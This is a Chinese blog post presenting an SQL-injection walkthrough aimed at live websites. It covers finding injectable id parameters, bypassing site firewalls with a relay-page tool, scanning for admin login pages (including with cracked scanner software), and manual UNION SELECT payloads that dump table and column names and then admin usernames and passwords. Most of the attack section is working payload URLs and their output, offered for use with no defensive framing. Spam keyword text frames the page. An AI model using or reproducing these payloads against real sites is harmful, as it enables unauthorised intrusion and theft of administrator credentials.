91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

sql注入學習經驗

發布時間:2020-06-26 12:48:42 來源:網絡 閱讀:1156 作者:qwe岳 欄目:安全技術

本人是一名***新手,信息安全專業的學生一直在學習關于安全方面的理論學習,主要進行的是網站的搭建,但自從接觸了web***之后才發現自己以前搭建的網站真是漏洞百出,從而也愛上了***的學習,今天就和大家分享一下我的學習成果,有什么不好的地方歡迎大家提意見!

   今天主要是講一講sql注入,sql注入的原理和危害就不多說了,大家百度一下就可以了,給大家講一講我的實踐經驗。

   sql注入的方法(get參數)

    復雜了沒用其實就兩種,工具注入與手工注入

   (一)選擇網站是否能進行sql注入(一般使用火狐瀏覽器比較好——方便)

    (1)先查看URL頁面為http://xxx.com/xxx/id=23 這樣的頁面或者為偽靜態的url也可進行注入。       ·

    (2)在url后輸入 

         and 1=1返回頁面正常

         and 1=2返回頁面錯誤

        

         or 1=1返回頁面錯誤

         or 1=2返回頁面正常

         這樣的網站就有注入漏洞

現在的網站基本都有網站防火墻(帶有防sql注入功能)這時可用‘工具注入中轉生成器’來重新生成一個頁面(注意打開這個頁面要用iis或小旋風),這樣就可以繞過網站安全狗了。

然后在新生成頁面進行操作。

         and 1=1返回頁面正常

         and 1=2返回頁面錯誤

        

         or 1=1返回頁面錯誤

         or 1=2返回頁面正常

這樣就可以進行下一步了。

   (一)個人經驗一般應先進行目錄的掃描,為什么呢?

    因為先應該找到網站后臺的登錄界面,如果連登陸界面都無法找到,就算知道了管理員的用戶 名密碼又有什么用呢。

    可以手工查找,就是猜名稱,一般為admin|login|user等asp、php、aspx、jsp后綴的,這種方 法有點傻,一般用工具進行網站遍歷。

    掃描工具:工具在附件里都有。我一般先使用御劍的掃描工具,但御劍的歲數畢竟不小了,也 沒有后續的更新,所以有些網站目錄是無法遍歷出來的,這是只能用一些牛逼的工具了。工具burpsuite(都說是***神器,我也一直在用,功能挺強大的,可以進行網站爬行與網站目錄的遍歷)還有就是Acunetix Web Vulnerability Scanner這款軟件也是非常強大的,現在出到10了,網上破解版。具體使用教程請自行百度。

   (二)進行注入

         可用工具啊D、明小子、pangolin穿山甲、sqlmap等工具進行注入,今天主要講解手工注入。

         手工注入:

      1、order by 1.....100判斷表數

         若頁面返回正常則說明這個數字小于表數,依次遞加,最好取中進行測試節省時間,最后一個           正確的為表數,如20正常,21不正常,則表數為20

      2、   http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT                                    1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

         顯示3,7數字

      3、   將3或7替換為database()、version()、user()、@@version——compile_os

            報基本信息  (1)database():數據庫名-------abc

                (2)version():數據庫版本--------5.1.63-community

                (3)user():數據庫用戶----------shsjk@localhost

                 (4)@@version——compile_os:操作系統--------win32

      4、表名查詢   http://xxx/xxx.php?id=23 and 1=2 UNION SELECT                            1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20from                information_schema.tables where table_schema=0x616263(此處為數據庫名,可用小葵          轉換工具轉換為Hex值)

         查詢結果為:wz_jj_admin,wz_jj_article,wz_jj_p_w_upload,wz_jj_class,wz_jj_en_admin,wz_jj_en_article,wz_jj_en_p_w_upload,wz_jj_en_class,wz_jj_en_key,wz_jj_en_links,wz_jj_en_message,wz_jj_key,wz_jj_links,wz_jj_message 

      5、分析表wz_jj_admin 查找表的列名

         http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT                            1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x777A5F6A6A5F61646D696E

        結果為:uid , ad_username,ad_password,ad_power,ad_intro

      6、查找用戶名,密碼http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,group_concat(ad_username,0x5c,ad_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from wz_jj_admin

      7、結果為:admin  admin888 這樣就成功了

這只是簡單的sql注入,后續的參數注入有post注入、cookie注入,請耐心等待!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

金溪县| 鄂尔多斯市| 德昌县| 兰考县| 洪江市| 仙游县| 山阳县| 河池市| 朔州市| 元谋县| 沛县| 黄平县| 开平市| 伊春市| 富宁县| 洮南市| 勐海县| 集贤县| 台江县| 德令哈市| 桂阳县| 西和县| 桐梓县| 平凉市| 嘉义县| 石阡县| 灌阳县| 夏邑县| 通榆县| 石楼县| 武功县| 彭州市| 慈利县| 辉南县| 博乐市| 钦州市| 高平市| 邹平县| 丹凤县| 安图县| 成武县|